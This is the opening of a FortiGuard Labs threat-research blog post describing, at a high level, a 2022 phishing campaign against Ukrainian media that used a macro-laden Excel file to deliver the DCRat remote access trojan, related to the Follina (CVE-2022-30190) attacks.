By Shunichi Imano, James Slaughter, and Fred Gutierrez | June 27, 2022
CERT-UA broke news on June 10, 2022 that various media outlets in Ukraine were targeted with emails containing a malicious document “СПИСОК_посилань_на_інтерактивні_карти.docx” (translated to English as “LIST_of_links_interactive_maps.docx”). According to the report, the document leverages a then zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), CVE-2022-30190 (Follina). The result is the download and execution of an unknown remote file on the compromised machine. Unfortunately, the payload has not been identified as the file was not available at the time of the investigation.
FortiGuard Labs came across another file that was likely used in the same attack campaign due to the use of identical file name, close timing of the CERT-UA report, the date of the file submission to VirusTotal, and the location of the submission being Ukraine. The new file however is in Excel (xlsx) format and contains malicious macros instead of the docx format and exploitation of CVE-2022-30190 (Follina). Payload is a DCRat variant, which is a commercial .NET Remote Access Trojan (RAT) commonly found being sold in underground forums.
This blog will explain how the attack works and evasive tactics used by threat actors to avoid detection to ultimately install DCRat onto an unsuspecting victim’s machine.
Affected Platforms: Windows
Impacted Parties: Windows users
Impact: Exfiltrating data for malicious purposes and keeping persistent backdoor access to the compromised machine
Severity Level: Medium
Unfortunately, an initial attack vector has not been identified. Potential victims likely received emails with a malicious attachment with identical Ukrainian file names such as: “СПИСОК_посилань на інтерактивні карти.xlsm”, except using the Excel format.